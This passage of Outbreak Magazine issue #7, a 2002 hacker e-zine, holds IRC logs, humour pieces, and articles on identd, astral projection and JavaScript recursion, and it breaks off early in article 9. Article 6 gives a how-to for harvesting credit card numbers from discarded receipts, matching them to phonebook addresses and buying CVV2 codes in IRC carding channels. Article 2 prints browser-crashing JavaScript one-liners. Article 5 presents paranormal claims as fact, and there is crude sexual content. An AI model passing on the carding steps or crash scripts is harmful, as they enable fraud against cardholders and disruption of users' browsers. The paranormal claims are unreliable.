Copy Link
Add to Bookmark
Report
Outbreak Issue 07
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
July 2002 - Issue #7 outbreak magazine - v7.0
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
"Yo baby I love you. I love you more than you know.
But you did me wrong. Give one dude a bj, shame on you.
Give two dudes a bj, shame on me. If you think I can't
get to you, you're wrong. You ain't nothing but a
stupid hoe, and you will always be a stupid hoe.
Love always, you're teddy bear.
Spoonie"
- Spoonie Luv from Up Above (Crank Yankers)
[editorial]
Welcome to issue #7 of Outbreak Magazine. As you can see
we have a new layout. I hope you all enjoy it. Fwaggle
got bored one day and decided to make it for us. I like it.
Anyway, this issue is jam full of some pretty good stuff.
So read away, and learn something.
If you have any articles that you've written sitting around
collecting dust, send those puppies our way. Give them a
chance to be read by a bunch of people.
Send all text files to: outbreak@fwaggle.net
Thanks! Hope you enjoy #7.
- kleptic <outbreak@fwaggle.net>
[/editorial]
[staff writers]
faught the law, and the law won : kleptic <outbreak@fwaggle.net>
would walk 500 miles : fwaggle <root@fwaggle.net>
wants you to want him : amatier <amatier@twcny.rr.com>
he will do anything for love : dropcode <uberego@hotmail.com>
he's more than a feeling : antimatt3r <antimatt3r@hotmail.com>
he's kung-fu fighting : rambox <rambox@rambox.net>
broke on through to the other side : Prodigal|Son <amlouden@insightbb.com>
whipping it good : GPC <lookathistext@forhisaddress.com>
it's raining men : gr3p <grthreep@gr3p.net>
rocking the casba : Ryan <ryan@insidergaming.net>
wants to wang chung tonight : Radioactive_Raindeer <asdf@asdf.com>
got knocked down, but got up again : Timeless <timeless@timelessguru.com>
wants you to pour some sugar on him : TheEnigma <enigm4@freeshell.org>
wants to be sedated : dirV <dirv@askhimforit.com>
wants to be a california girl : Turbanator <turbanator2k2@yahoo.com>
[/staff writers]
[shout outs]
All @ #hackerzlair on irc.dal.net, phonelosers.org,
scene.textfiles.com, diegeekdie.org, hackerzlair.org,
fwaggle.net, dsinet.org, ameriphreak.com, surviveall.net,
gr3p.net/heavenly/, gr3p.net, gr3p.net/ravagrrl/,
guruworld.org, dark-horizon.org, #outbreakzine on irc.dal.net,
Everyone that helped out with this issue of Outbreak.
You all rule!
[/shout outs]
[contact us]
ÜßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßÜ
\-Û http://www.fwaggle.net/~outbreak Û-/
ßÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜß
Vist Us @ IRC.DAL.NET
Join #outbreakzine
Send all articles for submission to:
outbreak@fwaggle.net
[/contact us]
ÜÜܲ ± ÞÛÜÜ ÜÜÛÝÜÜÜÛÜ ÜÜ ÜÜÜ
ÛÛßß² ÜÛÜ Ü ÜÜ ÜÜÜß²ÛÛÛÝßÞÛßßÛÞÛÛßÛ°Û°ÛÜÜÜÜÜÛÝ
ÜÝ ÛÛ Ûß±ßÛÞÛÛßÛ°ÛÝ ÞÛÛÝ ÞÛÜÛ ÛÛ ßÛÛÝß²Û²ÛÝß ÞÜ°
ß²²²Ûßß ß ÞÛÝ ÛÜ°ÜÛ ÛÛ ßÛÛÝ ÛÛÛ ÞÛ ÜÜÛ±Ü ÜÛÛ ÞÛ°Ý ß ßßÛ²²²ß
²² issue ÛÛÜܱßÛß ÜÛ±Û ÜÛÛ ßÛÛÛß ÛÛÛÛ-fwaggle ÛÛÛ july ²²
²Ý #7 ßßß² ± ßßßßß 2002 Þ²
²Ý Þ²
²Ý file description author Þ²
°Ý ~~~' ~~~~~~~~~~' ~~~~~' Þ²
°Ý Þ²
±Ý [00] Editorial kleptic Þ²
±Ý [01] Take Advantage of Me, I'm Drunk rambox Þ²
±Ý [02] Recursive Function Calls Timeless Þ²
°Ý [03] Very Interesting kleptic Þ²
°Ý [04] Anatomy of Your Enemy Justin Sane Þ²
°Ý [05] The anTrojan Filez 5 Timeless Þ²
²Ý [06] 3l33t 0d4y Virgin CC's dirV Þ²
²Ý [07] IRC - Did you ever notice...? GPC Þ²
²Ý [08] Uselessness and Dangers of Identd antimatt3r Þ²
²Ý [09] In The Game of Life sin|cal Þ²
²Ý [10] Responsibilities of Trusted Hosts dropcode Þ²
²Ý [11] Cordless Beige Box snadman Þ²
²Ý [12] Turncoat Mayhem atomichael Þ²
²Ý [13] SMTP:Fakemail and SPAM Turbanator Þ²
²Ý [14] Black Box Plans evo225 Þ²
²Ý [15] A Little Rantin' On The Hackin' bluecat9 Þ²
²Ý [16] Conclusion Outbreak Staff Þ²
²Ý Þ²
Û²Ü Ü²Û
ß²Ûßßßß ß ß ßßßßÛ²ß
Þ Ý
[video notice]
windows users: (win98 or higher) you can open these files in notepad,
and set your font to terminal, size 9. if you prefer console or
MS-DOS, then just open it in MS-DOS editor, making sure if you're
using windows that you hit ctrl+enter to make it full screen.
linux users: view in console using an editor such as joe, or use
less -R <filename>. x windows users can view by using a font such as
nexus, or the terminal.pcf font that fwaggle created but lost.
[/video notice]
[legal notice]
all texts used in this magazine are submitted by various contributors
and to the best of our knowledge these contributors are the rightful
copyright owners. feel free to redistribute this magazine in it's
entirety, but you may not redistribute or reproduce parts of this
publication without express permission from the staff.
[/legal notice]
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #7 - Article 1 of 16
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
[3:17pm] *** Now talking in #teensex
[3:18pm] <A_rEaLly_dRuNk_gUy> any1 want 2 take advantage of a drunk guy?
[3:19pm] <rambox> i want to take advantage of a drunk guy
[3:20pm] <A_rEaLly_dRuNk_gUy> r u a girl or a guy?
[3:20pm] <rambox> why does that matter? i just want to take advantage
[3:20pm] <rambox> ok so
[3:20pm] <rambox> heres the agenda
[3:20pm] <rambox> i need my laundry done
[3:20pm] <rambox> and my lawn mowed
[3:21pm] <rambox> clean my toilet and tub
[3:21pm] <rambox> go out and buy me some beer with your own money
[3:21pm] <rambox> sound good?
[3:22pm] <rambox> hello???
[3:22pm] <rambox> you must be already workin on those chores huh?
[3:22pm] <A_rEaLly_dRuNk_gUy> hehe
[3:22pm] <A_rEaLly_dRuNk_gUy> nice
[3:22pm] <A_rEaLly_dRuNk_gUy> i AM drunk
[3:22pm] <rambox> yes
[3:22pm] <A_rEaLly_dRuNk_gUy> but i AM not that drunk
[3:22pm] <A_rEaLly_dRuNk_gUy> hehe
[3:23pm] <rambox> you're drunk so you can't decipher that im taking
advantage of you
[3:23pm] <rambox> dont shrink my lucky boxers
[3:23pm] <rambox> dont make me bust out jedi mind tricks
[3:23pm] <A_rEaLly_dRuNk_gUy> ehhh..
[3:24pm] * rambox uses the force
[3:24pm] <rambox> wash my jockies you will.. HMMM
[3:24pm] <A_rEaLly_dRuNk_gUy> damn it i want girls not guys with boxers..
[3:24pm] <A_rEaLly_dRuNk_gUy> ewwww
[3:24pm] <A_rEaLly_dRuNk_gUy> hehehe
[3:24pm] <A_rEaLly_dRuNk_gUy> but seriously..
[3:24pm] <rambox> i just want you to do my personal stuff
[3:24pm] <rambox> get my cum stains out of my bedsheets
[3:24pm] <rambox> buy me beer
[3:24pm] <A_rEaLly_dRuNk_gUy> i'm really drunk right now.. but i don't want
another guy..
[3:25pm] <rambox> handwash my jockstrap
[3:25pm] <rambox> i dont want you, i just want you to clean my house and
laundry
[3:25pm] <A_rEaLly_dRuNk_gUy> me too
[3:25pm] <rambox> ok good
[3:25pm] <A_rEaLly_dRuNk_gUy> i don't anything 2 do with u..
[3:25pm] <rambox> no no, your going to do my laundry
[3:25pm] <rambox> you want to do my laundry
[3:25pm] <A_rEaLly_dRuNk_gUy> geez.. u want a maid or something.. i'm not
THAT drunk!!!
[3:26pm] <rambox> you want to clean my toilet
[3:27pm] <rambox> hm
[3:27pm] <rambox> any other drunk man would be elbow deep in my jockstrap
right now
[3:27pm] <rambox> washin that shit with a sponge
[3:27pm] <rambox> while scrubbin my floor with there feet
[3:28pm] <rambox> so get to work country fucker
[3:31pm] <A_rEaLly_dRuNk_gUy> eehh.. u hav a really dirty house there dude..
seriously u should get some professional help..
[3:32pm] <rambox> do you have a job?
[3:33pm] <A_rEaLly_dRuNk_gUy> neh..
[3:34pm] <rambox> oh
[3:34pm] <rambox> well anyway i just took a sloppy shit on my floor
[3:34pm] <rambox> i hope you have a rug cleaner
[3:35pm] <A_rEaLly_dRuNk_gUy> u hav a shitty, life dude.. i mean 2 take a
dump on ur floor?!
[3:37pm] <rambox> well i was expectin you to clean it
[3:37pm] <rambox> since im taking advantage of you an all..
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #7 - Article 2 of 16
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
Recursive Function Calls
========================
by Timeless
2002-06-10
One day I was messing around because I was bored and thought I'd try writing
some one-liner code in JavaScript. The first thing that came to me to try was a
function that calls itself without any hope of breaking out of the sprial.
I simply placed the following in the address bar of Internet Explorer to run the
code and pressed Enter (some people like to use the "Go" button):
javascript:function me(){me()}me();
Naturally, it ran out of stack space and presented me with an error stating
the fact. This is perfectly acceptable behaviour.
Very well, so I tried a different approach. What if I made the function add
characters to the web page (document body) recursively. Naturally I would either
expect to see a stack space error or an out of memory error (whichever happens
first). So here's my next one-liner:
javascript:function w(){document.body.innerHTML+=' ';w()};w();
Well, shock, horror and disbelief... there was no stack nor memory error at all!
In fact, the browser just died on me! I had mixed results though and needed to
tweak the code a bit because in some cases it would only crash on the second
attempt. So I made it look like this (fit on one line please):
javascript:function w(){document.body.innerHTML+=' ';w()};
setTimeout('w()',100);w();
This new code would manage to run a second recursive call even after the first
one had died (silently!). This time it killed the browser much more
consistently.
Notice that I am using "innerHTML", that's because "document.write" behaved as
it should - it reported an out of memory error. So basically, if the innerHTML
property can be overflowed... *insert your imagination here*
- Timeless
PS. Greetz to all at #hackerzlair and #outbreakzine and to Radioactive_Raindeer
and splitfeed, and all my other friends - you know who you are.
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #7 - Article 3 of 16
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
Very Interesting
----------------
By: kleptic <outbreak@fwaggle.net>
What makes someone an interesting person?
To answer that question I'm going to use an excellent example of an interesting
person: me. I am far more interesting than anyone else I have ever met. I am
interested in all the same things as myself.
The defining feature of an "interesting person" is that they are interested in the
same things you are. This is an undisputable truth. If you do not share interests
with the person in question, you simply will not find them interesting. It is also
true that the more interests you share with a person, the more interesting you probably
find them. Therefore, seeing as you are interested in every single thing that you
yourself are interested in, you must find yourself more interesting than anyone else
you know. Don't worry, this doesn't make you a snob, just human.
This could be proven untrue, of course, if it was essential for a person you find
interesting to be a separate entity from yourself. For some people, this is
undoubtedly the case. They find many other people interesting, but take no interest
in their own activities. This is probably the result of the person wanting to do what
the people they find interesting are doing, but judging themselves unfit to participate,
for some reason. Laziness?
I could be wrong. Maybe some people truly are not interested in any actual activity,
only other people. In that case, you could not possibly find them interesting, seeing
as they have no interest that can be matched with one of your own. I find the existence
of people who are only interested in other people fascinating. How do I classify my
interest in them? I'm not intrigued by the actual people they are interested in, nor
any specific activity of the person, unless you consider not being interested an activity
in itself, or at least an inactivity. Does that mean I'm interested in not being interested?
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #7 - Article 4 of 16
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
Anatomy of Your Enemy
---------------------
By Justin Sane from Anti-Flag (off the mobilize cd)
10 easy steps to create an enemy and start a war:
Listen closely because we will all see this weapon used in our lives.
It can be used on a society of the most ignorant to the most highly educated.
We need to see their tactics as a weapon against humanity and not as truth.
First step: create the enemy. Sometimes this will be done for you.
Second step: be sure the enemy you have chosen is nothing like you.
Find obvious differences like race, language, religion, dietary habits
fashion. Emphasize that their soldiers are not doing a job,
they are heatless murderers who enjoy killing.
Third step: Once these differences are established continue to reinforce them
with all disseminated information.
Fourth step: Have the media broadcast only the ruling party's information
this can be done through state run media.
Remember, in times of conflict all for-profit media repeats the ruling partys
information. Therefore all for-profit media becomes state-run.
Fifth step: show this enemy in actions that seem strange, militant, or different.
Always portray the enemy as non-human, evil, a killing machine.
Sixth step: Eliminate opposition to the ruling party.
Create an "Us versus Them" mentality. Leave no room for opinions in between.
One that does not support all actions of the ruling party should be considered
a traitor.
Seventh step: Use nationalistic and/or religious symbols and rhetoric to define
all actions. This can be achieved by slogans such as "freedom loving people
versus those who hate freedom." This can also be achieved by the use of flags.
Eighth step: Align all actions with the dominant deity.
It is very effective to use terms like, "It is gods will" or "god bless our
nation."
Ninth step: Design propaganda to show that your soldiers
have feelings, hopes, families, and loved ones.
Make it cleat that your soldiers are doing a duty; they do not want or like to
kill.
Tenth step: Create and atmosphere of fear, and instability
and then offer the ruling party as the only solutions to comfort the publics
fears. Remembering the fear of the unknown is always the strongest fear.
We are not countries. We are not nations. We are not religions.
We are not gods. We are not weapons. We are not ammunition.
We are not killers. We will NOT be tools.
I'm not a fucker
I will not die
I will not kill
I will not be your slave
I will not fight your battle
I will not die on your battlefield
I will not fight for your world
I am not a fighter
I'm in unity.
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #7 - Article 5 of 16
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
"The anTrojan Filez 5"
by Timeless
-=¬~"^"~¬=-.,__,.-=¬~"^"~¬=-.,__,.-=¬~"^"~¬=-.,__,.-=¬~"^"~¬=-.,__,.-=¬~"^"~¬=-.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-.,__,.-=¬~"^"~¬=-.,__,.-=¬~"^"~¬=-.,__,.-=¬~"^"~¬=-.,__,.-=¬~"^"~¬=-.,__,.-=¬~
--------oOOo--------
aStRaL hAcKiNg
--------oOOo--------
INTRODUCTION - OPEN YOUR MIND, WE'RE GOING IN (OR OUT?)!
If you look back to "anTrojan Filez 3" (outbreak issue #4, page 2) you will see
a glimpse at what you are about to learn in this article.
Some people ask me from time to time "are you still hacking the astral plane?".
They are of course referring to astral projection (AP). Astral projection is a
technique for "travelling" out of your body. I'm not going to go too deep into
this, and if you're really interested you can go and get some pretty decent
books on the subject from your local library or book store.
I am also not going to get into any religious or philosophical debates about it
either! So don't even go there!
A BIT OF HISTORY
I've been experiencing weird and paranormal shit ever since I was a kid. When I
was 16 I decided to learn about hypnosis in order to try and enhance any "gifts"
I might possibly have, or that may lie dormant within me (such as telepathy,
telekinesis, ability to see ghosts, sense emotions, sense people's locations,
etc. - some of which I can do already). Hypnosis helped me with my French (using
self hypnosis) and rid my cousin of his smoking habit (using auto suggestion).
Hypnosis got me thinking about meditation, so I started doing T'ai Chi Chuan
(a martial art) to learn about a natural energy called Chi. Chi can make your
arm as stiff as a board, or ground you firmly to the spot, or even make your
opponent do things they did not want to do (like fall down), for example.
Eventually I came across astral projection and another technique called
Coordinate Remote Viewing (CRV - once secretly used by the military to a large
degree of success).
THE DESIRE TO LEARN
By this stage I was researching free energy, and in particular the use of
magnets as a power source. There is much that I learnt about the subject, but it
got to a point where human understanding of the topic became limited.
This was the turning point where I decided to make use of the tools I had.
This is when I started "hacking" the astral plane for "new" information that
humans did not have already.
THE DARK SIDE
One of the possible activities of astral projecting is looking up information in
what is known as the Akashic Records. Imagine the Akashic Records as the
universe's database of everything. It's like being in "flat land" in a computer,
and you can see any piece of data you like.
Bring this back into the context of your short, mortal life on this planet. Want
to have some fun? Of course you do! You can use the Akashic Records to see info
from the recent past, present and near future. If you get really good at it, you
could probably even get someone else's passwords!
CONCLUSION
I'm off now to be some insignificant and - hopefully - wealthy inventor. Don't
just take my word for all this though, go and read up on the topic for yourself
and draw your own conclusions.
-=¬~"^"~¬=-.,__,.-=¬~"^"~¬=-.,__,.-=¬~"^"~¬=-.,__,.-=¬~"^"~¬=-.,__,.-=¬~"^"~¬=-.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-.,__,.-=¬~"^"~¬=-.,__,.-=¬~"^"~¬=-.,__,.-=¬~"^"~¬=-.,__,.-=¬~"^"~¬=-.,__,.-=¬~
And so it continues, as your mind gets infected by the anTrojan filez (and after
reading this article you now begin to see how). Greetz to all at #outbreakzine,
#hackerzlair and #tinylittlepyramid (it didn't need to be a very big pyramid
after all) on DalNet.
- Timeless
2002-06-10
Disclaimer: may or may not be fictional. You are responsible for your own
actions and state of mind. More people are into this than you might realize at
first, so don't single me out if you have an issue.
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #7 - Article 6 of 16
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
-----------------------------------------------------
3l33t 0d4y Virgin cc's by dirV
-----------------------------------------------------
Aight guys heres some 0day l33tn3ss - It is really
really easy to get virgin cc's. All you really have
to do is goto a gas station- The gas station has to
be a Quck Pay at the Pump One. Then go look in the
garbage next to the pumps. You should find a few
reciepts in the cans. On the reciepts you will see
1. Credit Card Number
2. Expiration Date
3. Name on Card.
-----------------------------------------------------
Then you take the reciepts to your Home and get out
the old phonebook. You look up the persons Name in
The phonebook and get there Address and phone number
-----------------------------------------------------
If you Need a Cvv2 (three digit # on back of card)
just goto #!chk #!check or type /list CC on dalnet,
goto a CC channel and they have !cvv2 triggers!
-----------------------------------------------------
Also If you dont have a gas station buy you, and you
happen to be walking down the street and you see any
kind of reciept on the ground, pick it up and look at
it because if the product that was purchased- was
purchased by a credit card - The CC# - expir dat - and
Name on card WILL ALWAYS BE ON THERE.
-------------------------------------------------------
Now your l33t, go have fun. dropcode rambox i lub u guys!!!
-------------------------------------------------------
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #7 - Article 7 of 16
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
****************************************
* IRC - Did you ever notice...? *
* *
* Written by GPC *
* On 20:52 11/06/02 *
* heelflip_the_biscuit_tin@hotmail.com *
* *
****************************************
PUBLIC SERVICE ANNOUNCEMENT : [The views expressed in this file are fucked
and are not necessarily the views of anyone.
Just becausa log appears here doesn't mean it
hasn't been shamelessly edited to make 'snadman'
and 'Timeless' look bad :p]
Many would say that this was the best text file ever to come out of the
publishing corporation on Ersa Minor, but they'd be wrong. I'm sure a lot of
you see the people on IRC as completely normal, but have you ever take the
time to step back and look at just what kind of person 'ten_inches' is?
Perhaps the best example of this is chat rooms. For some reason men see
'Lesbian Chatroom' and go bannanas. Say the room has 20 people in it. How
many
of those do you think are women? All of them right? Wrong. You really think
you're the only man in their pretending to be a woman and fumbling your way
through the spelling of clitoris? Think about it. No, think harder. Yeah,
that's right, I bet you wish you never gave 'busty_blonde' your mobile number now
do you. This poses some deep physcological questions like 'If the fantasy is
there, what does it matter who its with?' but I know Timeless would just get lost
so I won't go into them.
IRC channels generally tend to fall into 5 catagories in my experience:
1) RANDOM CHANNELS where one person with a name like 'single_n_looking'
seems to be talking to everyone but no one seems to be talking to him. Or there
are a load of people all talking at once and no one knows what message is being
sent to them. For example:
<snadman> but 4 real a turtle head is pking out laughing at the inside of my
boxers so i gotta get to the pot
<snadman> piking*
<snadman> poking*
<snadman> ahhh back
<GPC> good shit?
<snadman> T-A-K-I-N-G--A--D-U-M-P spells RELIE
<snadman> F
<snadman> yehp
<snadman> T-A-K-I-N-G--A--D-U-M-P spells RELIEF*
<snadman> :)
<GPC> oui,cest bon
2) RANDOM ROOMS that seem to be completely full but no one talks. The room
is dead, there's not a single person saying anything. These rooms are 'cool'.
3) SILENT HACKING CHANNELS where people go to hang out to be cool but are
too scared to say anything cos they're too scared of being called a script
kiddie.
4) HACKING CHANNELS with about 5 "l33t hackers" who are only ops cos their
mate runs the channel. They won't answer any1s questions cos they don't
actually know anything:
<Dumbass> haha ur no l33t, im l33t. i have AOL 9.0 from a l33t
underground warez site lam0rs.
* SuCkEr has joined #ubergodl33thaxx0rs
<SuCkEr> can u guys help me with some command
<snadman> shut up lamer. i was coding operating systems b4 u were born.
<SuCkEr> look. i just wanna know how to convert hex to decimal so I can
re-write my .ini files to redirect my IP port scan.
* Long Silence
<snadman> someone boot this lamer, he is tlking whack shit man. Only l33t
people shud be on this channel
<SuCkEr> er, are any of the ops even hackers in here?
<snadman> SOMEONE KICK THIS LAM00000R. HE IS ANGERING MY L33TNESS!!!!!!!!
5) CYBERING CHANNELS usually populated by the following:
a) Boys pretending to be men b) Men pretending to by boys
c) Girls pretending to be women d) Women pretending to be girls
e) Men pretending to be lesbians f) Kids who haven't realised what it is
g) Timeless
So, in conclusion (its been a long time comming), next time you give your
number to 'tits_bigger_than_the_USA' remember its probably a balding
perverted 50 year old man choking his chicken while he's talking to you with
some girl's used pants on his head.
PUBLIC SERVICE ANNOUNCEMENT 2: [I apologise for any damage this file might
have done for any l33t egos. I also apologize
to 'snadman' and 'Timeless' for absolutely
mis-representing them. They're safe dudes :D]
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #7 - Article 8 of 16
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
- - - - - - - - - - - - - - -
the uselessness and dangers of identd
by: antimatt3r
Jun 6 2002
- - - - - - - - - - - - - - -
The identification protocol (also knows as 'auth' on *nix systems)
is specified by RFC1413. This protocol in my opinion is useless and
potentially dangerious. The objective of this text is to inform you of the
uselessness and insecurities and make you wonder why the hell someone
integrated this protocol into the Internet.
Okay the first thing is that its rediciolusly pointless. The first
fundamental assumption behnd this protocol is that computers are multi-user
timesharing systems with secured operating systems. So if someone is running
windows you've already got that one falsified. The second is that the
computer user and the computer admin are different people. This isint such a
bad assumption, because most of us dont log in as root on *nix and start
running our everyday routine. But, on windows, most of us have our user
account set as the administrator. The third and final assumption is that the
systems admin is trustworthy. This is about the most brilliant one of them
all.
The upshot of these assumptions is that when recieving an ident
response you can trust the data that identifies a user who is trying to use
a network service on your server, because the admin on the other side who is
watching over his system and users with an eagle eye will readily and
happily identify his users to you, because you asked.
Once again, the majority of computer systems on the Internet violate
ALL the assumptions, becuase they are running windows which are single user,
not secure at all and have the user and admin as the same person. As for the
admin being trustworthy who knows. The data that any computer will return
has no bona fides or other utility other than as a random string or bits
which may or may not relate in any way to the user of the system. Even the
author of RFC1413 says that the protocol cant be used for anything real (
section 6).
The reason that the identification protocol is dangerous is that
there are some server admins who seem to believe that ident has some
utility, because they require it to use their services. (dalnet admins)
These people are deluding themselves, lulling themselves into a completeley
false sense of security - they believe that with ident they have an audit
trail which they can use to grab users who abuse their services. As the
protocol description above demonstrates, this is the assumption of a fool.
For the final part of this text I would like to talk about why
dalnet requires that you give a ident response. When connecting to dalnet
you get the 'checking ident' signal and then usually ident response comes
through, if there is no ident response, you/we get akilled. If you whois
someone on dalnet and they have a ~ in front of their hostname (eg.
~antimatt3r@suckme.net) their ident was not verified. It seems that dalnet
dosent really care if people send fake ident responses because if you look
on http://kline.dal.net/exploits/unixident.htm they supply a 'fakeident' RPM
package. So now not only is the dalnet hierarchy fucking dumb, but they are
supplying tools to evade the rules that the have put in place.
If your stuck without ident working, make sure your auth port is
uncommented in /etc/inetd.conf and try fowarding ports 5990 thru 6000 as
well as 113 if your on a routed intranet. If your using mIRC its in options
- connect - idnetd.
EOF
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #7 - Article 9 of 16
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
Society is what we picture it. Some picture it as a playground full of
wonderment and chaos. Those people are the ones that stand out mostly
and are criticized by local peers and put down. Maybe if only we took
